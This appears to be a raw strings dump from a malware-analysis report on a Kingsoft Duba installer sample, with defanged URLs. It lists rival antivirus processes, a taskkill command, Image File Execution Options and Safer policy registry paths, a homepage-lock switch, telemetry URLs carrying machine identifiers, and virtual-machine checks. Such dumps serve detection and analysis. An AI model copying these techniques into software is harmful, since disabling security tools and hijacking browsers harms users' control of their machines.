kxescore.exe
Global\F626D0A6-A5A1-4719-A80E-A07907F414C1-%s
Global\F626D0A6-A5A1-4719-A80E-A07907F414C1-%s
kxetray.exe
kxetray.exe
btbg.gif
btbg.gif
*.kid
*.kid
scom.xml
scom.xml
bc.sys
bc.sys
clear_i.xml
clear_i.xml
%s\%s
%s\%s
\6EED6E3F-BDA6-490e-8F67-6ECDD0697AB2
\6EED6E3F-BDA6-490e-8F67-6ECDD0697AB2
c:\Program Files
c:\Program Files
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{052CFB79-9D62-42E3-8A15-DE66C2C97C3E}
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{052CFB79-9D62-42E3-8A15-DE66C2C97C3E}
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\thunder_is1
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\thunder_is1
Global\48411015-6EB4-4469-8D21-A8A9C8B7FB0D
Global\48411015-6EB4-4469-8D21-A8A9C8B7FB0D
kpacket_info.dat
kpacket_info.dat
service%d
service%d
file%d
file%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360SD
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360SD
uninst.exe
uninst.exe
cmd.exe /c "
cmd.exe /c "
cmd.exe
cmd.exe
https
https
kxecomm.dat
kxecomm.dat
_sp.xcf
_sp.xcf
kxebase.dll
kxebase.dll
x-x-x-xx-xxxxxx
x-x-x-xx-xxxxxx
CLSID\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}
CLSID\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}
Software\Classes\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}
Software\Classes\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}
%d%s%s%s%d%s
%d%s%s%s%d%s
%s?v=2&p=%s&u=%s&m=%s&ip=%d&s=%s&mid=%d&dsn=%s&old_svrid=%s
%s?v=2&p=%s&u=%s&m=%s&ip=%d&s=%s&mid=%d&dsn=%s&old_svrid=%s
_duba.dat
_duba.dat
NextReportTime
NextReportTime
LastReportTime
LastReportTime
*.ich
*.ich
index_=%d&count_=%d
index_=%d&count_=%d
kich%d\
kich%d\
union_server0=hXXp://union.infoc.duba.net/nep/v1/
union_server0=hXXp://union.infoc.duba.net/nep/v1/
union_server1=hXXp://union.infoc.duba.net/nep/v1/
union_server1=hXXp://union.infoc.duba.net/nep/v1/
union_server2=hXXp://union.infoc.duba.net/nep/v1/
union_server2=hXXp://union.infoc.duba.net/nep/v1/
union_server%d
union_server%d
helpunion0.ksmobile.com/nep/v1/
helpunion0.ksmobile.com/nep/v1/
.datx
.datx
x.dat
x.dat
system32\DRIVERS\viostor.sys
system32\DRIVERS\viostor.sys
vmusrvc.exe
vmusrvc.exe
system32\DRIVERS\vpcubus.sys
system32\DRIVERS\vpcubus.sys
system32\DRIVERS\vpcgbus.sys
system32\DRIVERS\vpcgbus.sys
system32\DRIVERS\vpc-s3.sys
system32\DRIVERS\vpc-s3.sys
System32\vpc-s3.dll
System32\vpc-s3.dll
P#{ad498944-762f-11d0-8dcb-00c04fc3358c}
P#{ad498944-762f-11d0-8dcb-00c04fc3358c}
ddddddd
ddddddd
hg.dat
hg.dat
QQPCRTP
QQPCRTP
QQPCTray.exe
QQPCTray.exe
%d Byte
%d Byte
%d KB
%d KB
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
%SYSTEM%
%SYSTEM%
%WINDOWS%
%WINDOWS%
%CUR_DIR%
%CUR_DIR%
instSubKeyName
instSubKeyName
instRootKey
instRootKey
%d-%x-%x-%x.ich
%d-%x-%x-%x.ich
rcmdid
rcmdid
hXXp://did.ijinshan.com/db/
hXXp://did.ijinshan.com/db/
%d-%d-%d %d:%d:%d
%d-%d-%d %d:%d:%d
data\kunioncfg.dat
data\kunioncfg.dat
\\.\Pipe\
\\.\Pipe\
SYSTEM\CurrentControlSet\services\%s
SYSTEM\CurrentControlSet\services\%s
"%s" %s
"%s" %s
Psapi.dll
Psapi.dll
/pid %d /f
/pid %d /f
taskkill.exe
taskkill.exe
%s%s_d_%x
%s%s_d_%x
\\.\KAVBase
\\.\KAVBase
system32\drivers\KAVBase.sys
system32\drivers\KAVBase.sys
Kernel32.dll
Kernel32.dll
kavsetup.log
kavsetup.log
{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}
{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}
KANSvr.EXE
KANSvr.EXE
iexplore.exe
iexplore.exe
360sd.exe
360sd.exe
360rps.exe
360rps.exe
kavmenu.dll
kavmenu.dll
ksoft.xml
ksoft.xml
hXXp://VVV.baidu.com
hXXp://VVV.baidu.com
2012.sp3.0
2012.sp3.0
2012.3.0
2012.3.0
LdTermDaemon.exe
LdTermDaemon.exe
\LdTerm.exe
\LdTerm.exe
\LdxManager.exe
\LdxManager.exe
dinstalltimecfg.dat
dinstalltimecfg.dat
%s\%s.lnk
%s\%s.lnk
VVV.duba.com
VVV.duba.com
hXXp://VVV.duba.com
hXXp://VVV.duba.com
%s\kingsoft%x%s
%s\kingsoft%x%s
%s\*.*
%s\*.*
HTTP/1.1
HTTP/1.1
Host: %s:%d
Host: %s:%d
Content-Length: %d
Content-Length: %d
ChXXp://ct.duba.net/itid
ChXXp://ct.duba.net/itid
360Safe.exe
360Safe.exe
360Tray.exe
360Tray.exe
InstallDK.ini
InstallDK.ini
FileName%d
FileName%d
BakFile:%s, OriFile:%s, ErrCode:%d, DuiKang:%d
BakFile:%s, OriFile:%s, ErrCode:%d, DuiKang:%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360
HookPort
HookPort
ksetupwiz.exe
ksetupwiz.exe
security\ksde\kisknl64.sys
security\ksde\kisknl64.sys
security\kavbootc64.sys
security\kavbootc64.sys
security\kxescan\kdhacker64.sys
security\kxescan\kdhacker64.sys
security\kxescan\kdhacker.sys
security\kxescan\kdhacker.sys
security\kxescan\bc.sys
security\kxescan\bc.sys
ksapi.sys
ksapi.sys
security\ksde\kisknl.sys
security\ksde\kisknl.sys
security\kavbootc.sys
security\kavbootc.sys
\5.png
\5.png
\4.png
\4.png
\3.jpg
\3.jpg
\2.jpg
\2.jpg
\1.jpg
\1.jpg
kwstray.exe
kwstray.exe
kswbc.dll
kswbc.dll
kwsui.dll
kwsui.dll
kswebshield.exe
kswebshield.exe
kswebshield.dll
kswebshield.dll
KWSMain.exe
KWSMain.exe
kwssp.dll
kwssp.dll
data\ghostver.dat
data\ghostver.dat
%d:%d:%d:%d:%d
%d:%d:%d:%d:%d
SYSTEM\CurrentControlSet\services\Kingsoft Antivirus WebShield Service
SYSTEM\CurrentControlSet\services\Kingsoft Antivirus WebShield Service
hXXp://did.ijinshan.com/db/?v=2&p=%s&u=%s&m=%s&ip=%d&s=%s
hXXp://did.ijinshan.com/db/?v=2&p=%s&u=%s&m=%s&ip=%d&s=%s
hXXp://infoc0.duba.net/c/
hXXp://infoc0.duba.net/c/
ws2_32.dll
ws2_32.dll
kxetray.exe.manifest
kxetray.exe.manifest
kxescore.exe.manifest
kxescore.exe.manifest
%s_%d
%s_%d
KFixManifest::Delete Folder %s Error(%d)!
KFixManifest::Delete Folder %s Error(%d)!
KFixManifest::Delete File %s Error(%d)!
KFixManifest::Delete File %s Error(%d)!
setup.xml
setup.xml
{34115DF9-B9DE-49d2-A0B0-AF60FE6EF9D2}
{34115DF9-B9DE-49d2-A0B0-AF60FE6EF9D2}
.product.xml
.product.xml
KSafe.exe
KSafe.exe
KSafeSvc.exe
KSafeSvc.exe
QQPCMgr.exe
QQPCMgr.exe
QQPCRTP.exe
QQPCRTP.exe
TSSysKit.sys
TSSysKit.sys
d~%x\
d~%x\
kdrvmgr.exe
kdrvmgr.exe
uni0nst.exe
uni0nst.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Internet Security
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Internet Security
hXXp://VVV.ijinshan.com
hXXp://VVV.ijinshan.com
URLInfoAbout
URLInfoAbout
kismain.exe
kismain.exe
hXXp://download.duba.net/2011/lf/detect360.ini
hXXp://download.duba.net/2011/lf/detect360.ini
ksregbackup.reg
ksregbackup.reg
hXXp://cu003.VVV.duba.net/duba/tools/dubatools/usb/sysfixkill.exe
hXXp://cu003.VVV.duba.net/duba/tools/dubatools/usb/sysfixkill.exe
hXXp://bbs.duba.net/thread-22796291-1-1.html
hXXp://bbs.duba.net/thread-22796291-1-1.html
Ekingsoft_antivirus_test%d
Ekingsoft_antivirus_test%d
regedit.exe
regedit.exe
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
baidubrowser.exe
baidubrowser.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BaiduBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BaiduBrowser
ntdll.dll
ntdll.dll
ntoskrnl.exe
ntoskrnl.exe
okernel32.dll
okernel32.dll
DHKEY_CURRENT_CONFIG
DHKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
{677B9715-5692-49f6-979F-CD11EC963EFE}
{677B9715-5692-49f6-979F-CD11EC963EFE}
kresult.log
kresult.log
{C16A0C4F-108B-4580-A7A0-8DEF25D2E9EF}
{C16A0C4F-108B-4580-A7A0-8DEF25D2E9EF}
Global\{E02A6D98-80B3-4a54-89E3-116EB96D0664}_EXIST
Global\{E02A6D98-80B3-4a54-89E3-116EB96D0664}_EXIST
{35CCA0CB-F603-4a28-A436-CF5F47A68DFD}
{35CCA0CB-F603-4a28-A436-CF5F47A68DFD}
Doperation\cas\kinfoc.dll
Doperation\cas\kinfoc.dll
kinfoc.dll
kinfoc.dll
2C14B686-5925-45e2-A3AA-12F87FAE181C
2C14B686-5925-45e2-A3AA-12F87FAE181C
/aurl:
/aurl:
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
Advapi32.dll
Advapi32.dll
from=1&ver=0.3&errcode=%d
from=1&ver=0.3&errcode=%d
cmdline
cmdline
explorer.exe
explorer.exe
avrepair.xml
avrepair.xml
{dda3f824-d8cb-441b-834d-be2efd2c1a33}
{dda3f824-d8cb-441b-834d-be2efd2c1a33}
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths
KBigFile.exe
KBigFile.exe
perfopt.exeksafe.exe
perfopt.exeksafe.exe
netmon.exe
netmon.exe
ksafetray.exe
ksafetray.exe
ksafesvc.exe
ksafesvc.exe
hXXp://VVV.duba.com/
hXXp://VVV.duba.com/
hXXp://
hXXp://
http:\\
http:\\
qq.com
qq.com
.qq.com
.qq.com
123.duba.net
123.duba.net
hXXp://VVV.duba.com/?un%s_%s
hXXp://VVV.duba.com/?un%s_%s
BaiduPlayerRcmdInstDuba
BaiduPlayerRcmdInstDuba
/lockpage3rd:hXXp://VVV.duba.com/?un%s_%s
/lockpage3rd:hXXp://VVV.duba.com/?un%s_%s
Global\BFD88F2D-0990-4de4-AD0F-764F5894389A-%d
Global\BFD88F2D-0990-4de4-AD0F-764F5894389A-%d
hXXp://bbs.duba.net/thread-22681423-1-1.html
hXXp://bbs.duba.net/thread-22681423-1-1.html
http\shell\open\command
http\shell\open\command
\iexplore.exe
\iexplore.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
IE.AssocFile.HTM
IE.AssocFile.HTM
Dkavsetup_99_1.exe
Dkavsetup_99_1.exe
hXXp://cd001.VVV.duba.net/duba/install/2013/ever/kavsetup_99_1.exe
hXXp://cd001.VVV.duba.net/duba/install/2013/ever/kavsetup_99_1.exe
hXXp://VVV.ijinshan.com/
hXXp://VVV.ijinshan.com/
{ d d d d }
{ d d d d }
nTotalScroll=%d, nScolled=%d, bAdd=%d, nChange=%d
nTotalScroll=%d, nScolled=%d, bAdd=%d, nChange=%d
dbkmsgwnd
dbkmsgwnd
TimerScroll:before:m_bkTimerScroll=%s
TimerScroll:before:m_bkTimerScroll=%s
TimerScroll:end:m_bkTimerScroll=%s
TimerScroll:end:m_bkTimerScroll=%s
shoujikong.exe
shoujikong.exe
kphonetray.exe
kphonetray.exe
filemgr.dll
filemgr.dll
appmgr.dll
appmgr.dll
data\operation_contact.dat
data\operation_contact.dat
hXXp://wpa.b.qq.com/cgi/wpa.php?ln=1&key=XzgwMDA0MjEwMF8yMzc1NzlfODAwMDQyMTAwXzJf
hXXp://wpa.b.qq.com/cgi/wpa.php?ln=1&key=XzgwMDA0MjEwMF8yMzc1NzlfODAwMDQyMTAwXzJf
liebao.exe
liebao.exe
LBBrowser\liebao.exe
LBBrowser\liebao.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao
InstallExe
InstallExe
%d-%d-%d
%d-%d-%d
hXXp://sighttp.qq.com/authd?IDKEY=4a05d1131c1eec69db5a99c1452ee9869a1af0ced4fc9956
hXXp://sighttp.qq.com/authd?IDKEY=4a05d1131c1eec69db5a99c1452ee9869a1af0ced4fc9956
hXXp://bbs.duba.net/thread-22672832-1-1.html
hXXp://bbs.duba.net/thread-22672832-1-1.html
hXXp://VVV.ijinshan.com/protocol/dubaUserLicense.shtml
hXXp://VVV.ijinshan.com/protocol/dubaUserLicense.shtml
FhXXp://download.duba.net/2011/lf/duba_uninstall_warn_descript8.xml
FhXXp://download.duba.net/2011/lf/duba_uninstall_warn_descript8.xml
hXXp://download.duba.net/2011/lf/duba_uninstall_warn_tip8.png
hXXp://download.duba.net/2011/lf/duba_uninstall_warn_tip8.png
warntype=%d&click=%d
warntype=%d&click=%d
\ux
\ux
Fkvipcore.dll
Fkvipcore.dll
passport
passport
s%s_d_%x
s%s_d_%x
kisknl64.sys
kisknl64.sys
kisknl.sys
kisknl.sys
%s\%d-%x-%x-%x.ich
%s\%d-%x-%x-%x.ich
.hXXp://infoc2.duba.net/c/
.hXXp://infoc2.duba.net/c/
hXXp://tj.union.ijinshan.com/c/
hXXp://tj.union.ijinshan.com/c/
-unionid=%s
-unionid=%s
"%s%s" -autorun
"%s%s" -autorun
%s_%s
%s_%s
RightKeyKillVirusMenu
RightKeyKillVirusMenu
RightKeyDeleteFileMenu
RightKeyDeleteFileMenu
desktop.ini
desktop.ini
d[.ShellClassInfo]
d[.ShellClassInfo]
IconFile=kxetray.exe
IconFile=kxetray.exe
dscom.dll
dscom.dll
dinstall.xml
dinstall.xml
clear.xml
clear.xml
H\winhttp.dll
H\winhttp.dll
HTTP/1.1
HTTP/1.1
\wbem\wuapiget.dll
\wbem\wuapiget.dll
\wbem\localun.dll
\wbem\localun.dll
\wbem\keysmgr.dll
\wbem\keysmgr.dll
\wbem\wuapier.sys
\wbem\wuapier.sys
c_999223.dat
c_999223.dat
%Program Files%\Amd495Sbses53
%Program Files%\Amd495Sbses53
%Program Files%\Admin704Win
%Program Files%\Admin704Win
%Program Files%\AdminWin
%Program Files%\AdminWin
%Program Files%\AdminLive
%Program Files%\AdminLive
%Program Files%\AdminMgr
%Program Files%\AdminMgr
calcengine.dat
calcengine.dat
calcengine.dll
calcengine.dll
\drivers\npfs139.sys
\drivers\npfs139.sys
kpopserver.exe
kpopserver.exe
krepair.exe
krepair.exe
kabaload.exe
kabaload.exe
KASMain.exe
KASMain.exe
KASTask.exe
KASTask.exe
KAVDX.exe
KAVDX.exe
KAV32.exe
KAV32.exe
KAVPFW.exe
KAVPFW.exe
KAVSetup.exe
KAVSetup.exe
KAVStart.exe
KAVStart.exe
killhidepid.exe
killhidepid.exe
KISLnchr.exe
KISLnchr.exe
kissvc.exe
kissvc.exe
KMailMon.exe
KMailMon.exe
KMFilter.exe
KMFilter.exe
KPFWSvc.exe
KPFWSvc.exe
krnl360svc.exe
krnl360svc.exe
KsLoader.exe
KsLoader.exe
KVSrvXP.exe
KVSrvXP.exe
kvupload.exe
kvupload.exe
kvwsc.exe
kvwsc.exe
KvXP_1.kxp
KvXP_1.kxp
KWatch.exe
KWatch.exe
KWatch9x.exe
KWatch9x.exe
KWatchX.exe
KWatchX.exe
KSafeTray.exe
KSafeTray.exe
upsvc.exe
upsvc.exe
kislive.exe
kislive.exe
KWSUpd.exe
KWSUpd.exe
kwsmain.exe
kwsmain.exe
KSWebShield.exe
KSWebShield.exe
uniuwiz.exe
uniuwiz.exe
ksmsvc.exe
ksmsvc.exe
ksmgui.exe
ksmgui.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
\????????.sys
\????????.sys
xxxxxxxx.sys
xxxxxxxx.sys
%System%\drivers\p2phook.sys
%System%\drivers\p2phook.sys
%System%\drivers\nthook.sys
%System%\drivers\nthook.sys
%System%\drivers\nhook.sys
%System%\drivers\nhook.sys
%System%\drivers\persist.sys
%System%\drivers\persist.sys
%System%\uspx.dll
%System%\uspx.dll
%System%\safemon.dll
%System%\safemon.dll
%System%\ups.dll
%System%\ups.dll
%System%\drivers\beep.sys
%System%\drivers\beep.sys
A707-22d2-9CBD-0000F87A469H}
A707-22d2-9CBD-0000F87A469H}
%Program Files%\Common Files\Microsoft Shared\INK\
%Program Files%\Common Files\Microsoft Shared\INK\
%WinDir%\conime\SSDT01.SYS
%WinDir%\conime\SSDT01.SYS
\*.sys
\*.sys
%Program Files%\AdminMgr\vmqutr.sys
%Program Files%\AdminMgr\vmqutr.sys
%Program Files%\AdminMgr\vmqutr.dll
%Program Files%\AdminMgr\vmqutr.dll
%Program Files%\AdminLive\vbcdtr.sys
%Program Files%\AdminLive\vbcdtr.sys
%Program Files%\AdminLive\vbcdtr.dll
%Program Files%\AdminLive\vbcdtr.dll
2345SafeTray.exe
2345SafeTray.exe
2345Service.exe
2345Service.exe
deepscan\zhudongfangyu.exe
deepscan\zhudongfangyu.exe
EfiMon.sys
EfiMon.sys
%Program Files%\360\360Safe\
%Program Files%\360\360Safe\
%Program Files% (x86)\360\360Safe\
%Program Files% (x86)\360\360Safe\
%s*.*
%s*.*
%s%s\
%s%s\
ksafe.exe
ksafe.exe
ksfmon.dll
ksfmon.dll
shoujizhushou.exe
shoujizhushou.exe
kmobiletray.dll
kmobiletray.dll
rstray.exe
rstray.exe
rsmain.exe
rsmain.exe
ravmond.exe
ravmond.exe
\\.\PhysicalDrive0
\\.\PhysicalDrive0
\\.\Scsi0
\\.\Scsi0
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
D:\dream\duba_u20862342_sv1_3_18.exe
D:\dream\duba_u20862342_sv1_3_18.exe
2016,01,07,15112
2016,01,07,15112
kpacket.exe
kpacket.exe
9,3,264354,15112
9,3,264354,15112
duba_u20862342_sv1_3_18.exe_632_rwx_00401000_0015B000:
u%SSSWSSSh
u%SSSWSSSh
9.Wt$9n
9.Wt$9n
u`SSh
u`SSh
8%uAP3
8%uAP3
t$SSh
t$SSh
PSSSSSSh
PSSSSSSh
aSSSh
aSSSh
.VVVVVSRSSj
.VVVVVSRSSj
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
t.Jt Jt
t.Jt Jt
8.tmpu
8.tmpu
kernel32.dll
kernel32.dll
gdiplus.dll
gdiplus.dll
.mixcrt
.mixcrt
KERNEL32.DLL
KERNEL32.DLL
mscoree.dll
mscoree.dll
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
WS2_32.dll
WS2_32.dll
%s:%d
%s:%d
WARNING: failed to save cookies in %s
WARNING: failed to save cookies in %s
About to connect() to %s%s port %ld (#%ld)
About to connect() to %s%s port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode (UTF-8) domains
IDN support not present, can't parse Unicode (UTF-8) domains
Protocol %s not supported or disabled in libcurl
Protocol %s not supported or disabled in libcurl
malformed
malformed
:]://%[^
:]://%[^
[^:]:%[^
[^:]:%[^
http_proxy
http_proxy
%5[^:@]:%5[^@]
%5[^:@]:%5[^@]
:%5[^@]
:%5[^@]
Port number too large: %lu
Port number too large: %lu
%s://%s%s%s:%hu%s%s%s
%s://%s%s%s:%hu%s%s%s
;type=%c
;type=%c
[%*45[0123456789abcdefABCDEF:.]%c
[%*45[0123456789abcdefABCDEF:.]%c
Couldn't find host %s in the _netrc file; using defaults
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
User-Agent: %s
Re-using existing connection! (#%ld) with host %s
Re-using existing connection! (#%ld) with host %s
%s://%s
%s://%s
Connection #%ld to host %s left intact
Connection #%ld to host %s left intact
operation aborted by callback
operation aborted by callback
ioctl callback returned error %d
ioctl callback returned error %d
the ioctl callback returned %d
the ioctl callback returned %d
seek callback returned error %d
seek callback returned error %d
Received problem %d in the chunky parser
Received problem %d in the chunky parser
HTTP server doesn't seem to support byte ranges. Cannot resume.
HTTP server doesn't seem to support byte ranges. Cannot resume.
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Added %s:%d:%s to DNS cache
Added %s:%d:%s to DNS cache
Resolve %s found illegal!
Resolve %s found illegal!
%5[^:]:%d:%5s
%5[^:]:%d:%5s
No URL set!
No URL set!
[^?&/:]://%c
[^?&/:]://%c
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Disables POST, goes with %s
Issue another request to this URL: '%s'
Issue another request to this URL: '%s'
unspecified error %d
unspecified error %d
%s cookie %s="%s" for domain %s, path %s, expire %lld
%s cookie %s="%s" for domain %s, path %s, expire %lld
#HttpOnly_
#HttpOnly_
httponly
httponly
I99[^;
I99[^;
skipped cookie with bad tailmatch domain: %s
skipped cookie with bad tailmatch domain: %s
skipped cookie with illegal dotcount domain: %s
skipped cookie with illegal dotcount domain: %s
23[^;=]=I99[^;
23[^;=]=I99[^;
%s%s%s
%s%s%s
# Fatal libcurl error
# Fatal libcurl error
# Netscape HTTP Cookie File
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/rfc/cookie_spec.html
# hXXp://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
# This file was generated by libcurl! Edit at your own risk.
[%s %s %s]
[%s %s %s]
Send failure: %s
Send failure: %s
Recv failure: %s
Recv failure: %s
bind failed with errno %d: %s
bind failed with errno %d: %s
Local port: %hu
Local port: %hu
getsockname() failed with errno %d: %s
getsockname() failed with errno %d: %s
Bind to local port %hu failed, trying next
Bind to local port %hu failed, trying next
Couldn't bind to '%s'
Couldn't bind to '%s'
Name '%s' family %i resolved to '%s' family %i
Name '%s' family %i resolved to '%s' family %i
Local Interface %s is ip %s using address family %i
Local Interface %s is ip %s using address family %i
ssloc inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
getpeername() failed with errno %d: %s
getpeername() failed with errno %d: %s
TCP_NODELAY set
TCP_NODELAY set
Could not set TCP_NODELAY: %s
Could not set TCP_NODELAY: %s
Failed to connect to %s: %s
Failed to connect to %s: %s
Trying %s...
Trying %s...
sa_addr inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
%d.%d.%d.%d
%d.%d.%d.%d
Could not resolve host: %s; %s
Could not resolve host: %s; %s
Could not resolve proxy: %s; %s
Could not resolve proxy: %s; %s
getaddrinfo() failed for %s:%d; %s
getaddrinfo() failed for %s:%d; %s
init_resolve_thread() failed for %s; %s
init_resolve_thread() failed for %s; %s
%sAuthorization: Basic %s
%sAuthorization: Basic %s
%s:%s
%s:%s
%s auth using %s with user '%s'
%s auth using %s with user '%s'
HTTP/
HTTP/
Avoided giant realloc for header (max is %d)!
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %d
The requested URL returned error: %d
If-Unmodified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Last-Modified: %s
If-Modified-Since: %s
If-Modified-Since: %s
%s, d %s M d:d:d GMT
%s, d %s M d:d:d GMT
Failed sending HTTP POST request
Failed sending HTTP POST request
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Internal HTTP POST error!
Internal HTTP POST error!
Failed sending HTTP request
Failed sending HTTP request
%s%s=%s
%s%s=%s
%s HTTP/%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
PTF://%s:%s@%s
PTF://%s:%s@%s
Content-Range: bytes %s/%lld
Content-Range: bytes %s/%lld
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s%lld/%lld
Range: bytes=%s
Range: bytes=%s
PTF://
PTF://
Host: %s%s%s:%hu
Host: %s%s%s:%hu
Host: %s%s%s
Host: %s%s%s
Chunky upload is not supported by HTTP 1.0
Chunky upload is not supported by HTTP 1.0
Accept-Encoding: %s
Accept-Encoding: %s
Referer: %s
Referer: %s
HTTP/1.0 connection set to keep alive!
HTTP/1.0 connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.1 proxy connection set close!
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.0 proxy connection set to keep alive!
HTTP 1.0, assume close after body
HTTP 1.0, assume close after body
RTSP/%d.%d =
RTSP/%d.%d =
HTTP =
HTTP =
HTTP/%d.%d =
HTTP/%d.%d =
Received HTTP code %d from proxy after CONNECT
Received HTTP code %d from proxy after CONNECT
HTTP/1.%d %d
HTTP/1.%d %d
CONNECT %s:%hu HTTP/%s
CONNECT %s:%hu HTTP/%s
%s%s%s%s
%s%s%s%s
Host: %s
Host: %s
%s:%hu
%s:%hu
Establish HTTP proxy tunnel to %s:%hu
Establish HTTP proxy tunnel to %s:%hu
Internal error removing splay node = %d
Internal error removing splay node = %d
Internal error clearing splay node = %d
Internal error clearing splay node = %d
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Failed to resolve "%s" for SOCKS4 connect.
Failed to resolve "%s" for SOCKS4 connect.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
SOCKS5 GSSAPI per-message authentication is not supported.
SOCKS5 GSSAPI per-message authentication is not supported.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Failed to resolve "%s" for SOCKS5 connect.
Failed to resolve "%s" for SOCKS5 connect.
User was rejected by the SOCKS5 server (%d %d).
User was rejected by the SOCKS5 server (%d %d).
--:--:--
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
password
password
login
login
Operation too slow. Less than %ld bytes/sec transfered the last %ld seconds
Operation too slow. Less than %ld bytes/sec transfered the last %ld seconds
Unable to parse FTP file list
Unable to parse FTP file list
Error in the SSH layer
Error in the SSH layer
Caller must register CURLOPT_CONV_ callback options
